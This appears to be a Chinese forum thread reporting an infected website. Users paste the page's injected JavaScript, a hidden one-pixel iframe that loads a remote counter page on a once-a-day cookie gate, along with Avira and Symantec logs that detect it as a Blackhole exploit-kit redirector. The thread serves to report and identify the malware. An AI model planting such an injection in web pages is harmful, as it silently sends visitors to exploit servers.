裏面

fireold

1. http://rscik.com/tag/サーターアンダギãƒÂ&frac14

复制代码

1. function zzzfff() {
   
2.      var slpdo = document.createElement('iframe');
   
3. 
   
4.      slpdo.src = 'http://www.offamazon.com/amazon.out/cnt.php';
   
5.      slpdo.style.position = 'absolute';
   
6.      slpdo.style.border = '0';
   
7.      slpdo.style.height = '1px';
   
8.      slpdo.style.width = '1px';
   
9.      slpdo.style.left = '1px';
   
10.      slpdo.style.top = '1px';
    
11. 
    
12.      if (!document.getElementById('slpdo')) {
    
13.          document.write('<div id=\'slpdo\'></div>');
    
14.          document.getElementById('slpdo').appendChild(slpdo);
    
15.      }
    
16. }
    
17. 
    
18. function SetCookie(cookieName, cookieValue, nDays, path) {
    
19.      var today = new Date();
    
20.      var expire = new Date();
    
21.      if (nDays == null || nDays == 0) nDays = 1;
    
22.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    
23.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    
24. }
    
25. 
    
26. function GetCookie(name) {
    
27.      var start = document.cookie.indexOf(name + "=");
    
28.      var len = start + name.length + 1;
    
29.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
    
30.          return null;
    
31.      }
    
32.      if (start == -1) return null;
    
33.      var end = document.cookie.indexOf(";", len);
    
34.      if (end == -1) end = document.cookie.length;
    
35.      return unescape(document.cookie.substring(len, end));
    
36. }
    
37. if (navigator.cookieEnabled) {
    
38.      if (GetCookie('visited_uq') == 55) {} else {
    
39.          SetCookie('visited_uq', '55', '1', '/');
    
40. 
    
41.          zzzfff();
    
42.      }
    
43. }

复制代码

Avira

2013/7/15 上午 06:47 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\%C3%82%C2%82&amp;Acirc;&amp;reg;&amp;Atilde;&amp;
      pound;&amp;Acirc;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%83
      &amp;Acirc;&amp;frac14[1].htm'
      包含病毒或有害的程式 'JS/BlacoleRef.CZ.29' [virus]
      已採取動作：
      檔案會移動至 '54048726.qua' 名稱底下的隔離區目錄。.

2013/7/15 上午 06:47 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        788
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/7/15 上午 06:46 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\%C3%82%C2%82&amp;Acirc;&amp;reg;&amp;Atilde;&amp;
      pound;&amp;Acirc;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%83
      &amp;Acirc;&amp;frac14[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.29 [virus]'
      執行的動作：傳輸至掃描程式

2013/7/15 上午 06:46 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\%C3%82%C2%82&amp;Acirc;&amp;reg;&amp;Atilde;&amp;
      pound;&amp;Acirc;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%83
      &amp;Acirc;&amp;frac14[1].htm 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.29 [virus]'
      執行的動作：拒絕存取

2013/7/15 上午 06:46 [Web Protection] 發現惡意程式碼
      從 URL
      "http://rscik.com/tag/&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;%C3%83%C2%82%C3%
      82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;Acirc;&amp;micro;&amp;Atilde;&amp;po
      und;&amp;Acirc;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%83&a
      mp;Acirc;&amp;frac14;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;%C3%83%C2%82%C3%8
      2%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;Acirc;&amp;iquest;&amp;Atilde;&amp;po
      und;&amp;Acirc;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%83&a
      mp;Acirc;&amp;frac14;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;%C3%83%C2%82%C3%8
      2%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;Acirc;&amp;cent;&amp;Atilde;&amp;poun
      d;&amp;Acirc;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%83&amp
      ;Acirc;&amp;sup3;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;%C3%83%C2%82%C3%82%C2
      %82&Acirc;%C3%83%C2%82%C3%82%C2%83&amp;Acirc;&Atilde;%C3%83%C2%82%C3%82%C2%82&Ac
      irc;%C3%83%C2%82%C3%82%C2%80&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;%C3%83%C2%
      82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%82&amp;Acirc;&amp;reg;&amp;Atilde;&am
      p;pound;&amp;Acirc;&Atilde;%C3%83%C2%82%C3%82%C2%82&Acirc;%C3%83%C2%82%C3%82%C2%
      83&amp;Acirc;&amp;frac14" 存取資料時，
      發現病毒或有害的程式 'JS/BlacoleRef.CZ.29' [virus]。
      已採取動作：已略過

尘梦幽然

类别： 入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013-07-15 12:30:05,高,阻止了 rscik.com 的入侵企图,已阻止,不需要操作,Web Attack: Mass Injection Website 5,不需要操作,不需要操作,"rscik.com (203.189.109.203, 80)","rscik.com/tag/&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&amp;Acirc;&amp;micro;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&AElig;’&amp;Acirc;&amp;frac14;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&amp;Acirc;&amp;iquest;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&AElig;’&amp;Acirc;&amp;frac14;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&amp;Acirc;&amp;cent;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&AElig;’&amp;Acirc;&amp;sup3;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&AElig;’&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;‚&not;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&amp;Acirc;&amp;reg;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&AElig;’&amp;Acirc;&amp;frac14","JERRYCHEN-PC (192.168.1.5, 52890)",203.189.109.203 (203.189.109.203),"TCP, www-http"
来自 <b>rscik.com/tag/&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&amp;Acirc;&amp;micro;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&AElig;’&amp;Acirc;&amp;frac14;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&amp;Acirc;&amp;iquest;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&AElig;’&amp;Acirc;&amp;frac14;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&amp;Acirc;&amp;cent;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&AElig;’&amp;Acirc;&amp;sup3;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&AElig;’&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;‚&not;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&amp;Acirc;&amp;reg;&amp;Atilde;&amp;pound;&amp;Acirc;&Atilde;&Atilde;ƒ&acirc;€š&Atilde;‚&acirc;€š&Acirc;&Atilde;ƒ&acirc;€š&Atilde;‚&AElig;’&amp;Acirc;&amp;frac14</b> 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME2\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE 引起。